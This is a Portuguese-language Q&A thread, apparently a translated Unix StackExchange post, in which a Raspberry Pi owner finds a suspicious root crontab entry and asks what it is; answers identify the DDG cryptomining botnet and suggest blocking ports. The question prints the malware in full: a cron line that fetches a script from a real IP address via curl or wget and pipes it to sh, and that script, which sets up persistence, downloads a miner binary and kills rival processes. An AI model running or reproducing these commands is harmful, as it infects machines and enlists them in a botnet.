Início / unix / Perguntas / 544811
Accepted
D__
Asked: 2019-10-03 09:25:30 +0800 CST

Entrada suspeita no crontab executando 'xribfa4' a cada 15 minutos

  • 772

Eu queria adicionar algo ao meu arquivo crontab raiz no meu Raspberry Pi e encontrei uma entrada que parece suspeita para mim, procurando partes dela no Google não resultou em nada.

Entrada do crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

O conteúdo de http://103.219.112.66:8000/i.shsão:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Meu conhecimento em Linux é limitado, mas para mim parece que baixar binários de um servidor indonésio e executá-los como root regularmente não é algo comum.

O que é isto? O que devo fazer?

security

2 respostas

  1. Best Answer

    É um botnet de mineração DDG, como funciona:

    1. explorando uma vulnerabilidade RCE
    2. modificando o crontab
    3. baixando o programa de mineração apropriado (escrito com go)
    4. iniciando o processo de mineração

    DDG: um botnet de mineração voltado para servidores de banco de dados

    SystemdMiner quando um botnet empresta a infraestrutura de outro botnet

    U&L: Como posso eliminar malware minerador em uma instância AWS EC2? (servidor comprometido)

    • 80

  2. Descubra quais portas TCP e UDP são realmente necessárias e bloqueie todas as outras portas no firewall do seu roteador. Possivelmente , essas entradas crontab não reaparecerão.

    Você pode ver quais portas estão abertas e públicas usando o Shields Up! recurso em grc.com .

    Sem bloquear as portas não utilizadas primeiro, ele pode ser reinfectado enquanto ele tenta corrigi-lo.

    • 3

relate perguntas